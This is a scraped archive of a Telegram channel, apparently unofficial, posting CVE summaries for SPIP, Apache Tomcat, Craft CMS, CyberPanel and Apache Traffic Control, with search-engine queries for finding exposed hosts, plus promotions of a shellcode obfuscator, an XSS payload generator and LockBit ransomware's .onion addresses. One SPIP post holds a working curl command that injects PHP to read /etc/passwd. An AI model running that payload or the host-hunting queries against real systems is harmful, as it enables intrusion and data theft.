en
Feedback
HackTheBox Academy

HackTheBox Academy

Closed channel

🔴Learn About #Linux 🔴Learn About #Windows 🔴Learn About #CVE 🔴Learn About #EXPLOIT 🔴Learn About #Vulnerability ✅ADMIN : @NullByte0x1

Show more
3 327
Subscribers
No data24 hours
-207 days
-9330 days
Posts Archive
↔️ CVE-2024-45387 ❗️ An SQL injection vulnerability in Traffic Ops in Apache Traffic Control <= 8.0.1, >= 8.0.0 allows
↔️ CVE-2024-45387 ❗️ An SQL injection vulnerability in Traffic Ops in Apache Traffic Control <= 8.0.1, >= 8.0.0 allows a privileged user with role "admin", "federation", "operations", "portal", or "steering" to execute arbitrary SQL against the database by sending a specially-crafted PUT request. 🖥 Exploit - POC 🔎 HUNTER:
product.name="Apache Traffic Server"
🔎Fofa:
product="APACHE-Traffic-Server"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

Active25 - The Cube.mp311.71 MB

Happy New Year. 2025. Wish You Guys Best From HackTheBox_Academy Team.
Happy New Year. 2025. Wish You Guys Best From HackTheBox_Academy Team.

↔️ CVE-2024-7954 ❗️ The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary
↔️ CVE-2024-7954 ❗️ The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request. 🖥 Exploit - POC ⚔️ Nuclei-Template 🔎 SHODAN:
app="SPIP"
🔎Fofa:
app="SPIP"
🎯 Manually Exploit:
curl -X POST "https://TARGET.COM/index.php?action=porte_plume_previsu" -H "Content-Type: application/x-www-form-urlencoded" -d 'data=AA_[<img111111>->URL`<?php system("cat /etc/passwd"); ?>`]_BB'
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-7954 ❗️ The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary
↔️ CVE-2024-7954 ❗️ The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request. 🖥 Exploit - POC ⚔️ Nuclei-Template 🔎 SHODAN:
app="SPIP"
🔎Fofa:
app="SPIP"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🌎 Cross Site Request Forgery | how scammers create fake websites and links?! #Course #Ethical_Hacker #Web #XSS #Phishing ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🌎 Remotely Control Any TV. #Course #Security #ADB #Android ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🛡 LexiCrypt is a shellcode obfuscation and encoding tool that transforms raw shellcode bytes into a "lexicon" of words deriv
🛡 LexiCrypt is a shellcode obfuscation and encoding tool that transforms raw shellcode bytes into a "lexicon" of words derived from file names in the windows system32 directory, the /usr/bin directory on linux, or use a randomly generated list at runtime. The resulting encoded output can then be embedded into a code template in various programming languages (e.g., C++, Rust, C#, Go, VBScript/WScript). 🖥 GitHub #Encryption #Tool #ShellCode ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🔠 XSSDynaGen ⭐️ XSSDynaGen is a tool designed to analyze URLs with parameters, identify the characters allowed by the server
🔠 XSSDynaGen ⭐️ XSSDynaGen is a tool designed to analyze URLs with parameters, identify the characters allowed by the server, and generate advanced XSS payloads based on the analysis results. 💫 Features: 💜 Curated Passive Sources to maximize comprehensive URL discovery 💜 Tests allowed and blocked characters for each parameter. 💜 Produces tailored XSS payloads based on server allowed characters. 💜 Generates payloads with techniques like null bytes, Unicode encoding, and obfuscation. 🖥 GitHub #Web #Tools #XSS #Pentest #Ethical_Hacker ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🔒 LOCKBIT 🔒 🎃 LockBit Ransomware Is Malicious Software Designed To Block User Access To Computer Systems In Exchange For A
🔒 LOCKBIT 🔒 🎃 LockBit Ransomware Is Malicious Software Designed To Block User Access To Computer Systems In Exchange For A Ransom Payment. 🌎 VERSION 4 IS RELEASED.
http://lockbitapyx2kr5b7ma7qn6ziwqgbrij2czhcbojuxmgnwpkgv2yx2yd.onion http://lockbitapyum2wks2lbcnrovcgxj7ne3ua7hhcmshh3s3ajtpookohqd.onion http://lockbitapp24bvbi43n3qmtfcasf2veaeagjxatgbwtxnsh5w32mljad.onion http://lockbitapo3wkqddx2ka7t45hejurybzzjpos4cpeliudgv35kkizrid.onion http://lockbitapiahy43zttdhslabjvx4q6k24xx7r33qtcvwqehmnnqxy3yd.onion
#RansomWare #Hacking #Pentest #Ethical_Hacker #LockBit #Tools ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-56145 ❗️ Users of affected versions are affected by this vulnerability if their php.ini configuration has registe
↔️ CVE-2024-56145 ❗️ Users of affected versions are affected by this vulnerability if their php.ini configuration has register_argc_argv enabled. For these users an unspecified remote code execution vector is present. 🖥 Exploit - POC 🔎 Hunter.How:
product.name="Craft CMS"
🔎Fofa:
product="craft-cms"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-50379 ❗️ Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability during JSP compilation in Apache Tomcat permits an RCE on case insensitive file systems when the default servlet is enabled for write (non-default configuration). 🖥 Exploit - POC ⚔️ Nuclei-Template 🔎 Hunter.How:
product.name="Apache Tomcat"
🔎Fofa:
product="APACHE-Tomcat"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️ 💠 تست نفوذ را رایگان یاد بگیر . ⭕️ @TryHackBox 📖 کتاب ها و منابع Cyber Security 📚 @LibrarySecOfficial 💠 رودمپ های مختلف از جمله ردتیم بلوتیم تست نفوذ و ... ⭕️ @TryHackBoxOfficial 💠 منابع BlueTeam : ⭕️ @BlueTeamKit 💠 ابزارها و دوره های OSINT ⭕️ @OsintGit 💠 برگزاری دوره های امنیت سایبری ⭕ @kasraone_com 💠 تمامی منابع Red Team اینجاست! 💠 آموزش توسعه بدافزار (رایگان) ⭕ @RedTeamVillageRTV 💠 منابع CTF و رایت آپ ها و دوره های HackTheBox  : ⭕ @PfkCTF 💠پنتست وب رو یاد بگیر ⭕️ @GitBook_s 💠 دوره های آموزشی, CVE-Exploit ⭕ @HackTheBox_Academy 💠 برای اضافه شدن در لیست پیام دهید : 🤖 @Unique_exploitbot ⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️

sticker.webp0.24 KB

⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️ 💠 تست نفوذ را رایگان یاد بگیر . ⭕️ @TryHackBox 📖 کتاب ها و منابع Cyber Security 📚 @LibrarySecOfficial 💠 رودمپ های مختلف از جمله ردتیم بلوتیم تست نفوذ و ... ⭕️ @TryHackBoxOfficial 💠 منابع BlueTeam : ⭕️ @BlueTeamKit 💠 ابزارها و دوره های OSINT ⭕️ @OsintGit 💠 برگزاری دوره های امنیت سایبری ⭕ @kasraone_com 💠 تمامی منابع Red Team اینجاست! 💠 آموزش توسعه بدافزار (رایگان) ⭕ @RedTeamVillageRTV 💠 منابع CTF و رایت آپ ها و دوره های HackTheBox  : ⭕ @PfkCTF 💠پنتست وب رو یاد بگیر ⭕️ @GitBook_s 💠 دوره های آموزشی, CVE-Exploit ⭕ @HackTheBox_Academy 💠 برای اضافه شدن در لیست پیام دهید : 🤖 @Unique_exploitbot ⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️

sticker.webp0.24 KB

↔️ CVE-2024-53376 ❗️ CyberPanel before 2.3.8 allows remote authenticated users to execute arbitrary commands via shell metach
↔️ CVE-2024-53376 ❗️ CyberPanel before 2.3.8 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the phpSelection field to the websites/submitWebsiteCreation URI. 🖥 Exploit - POC 🔎 Hunter.How:
product.name="CyberPanel"
🔎Fofa:
product="CyberPanel"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security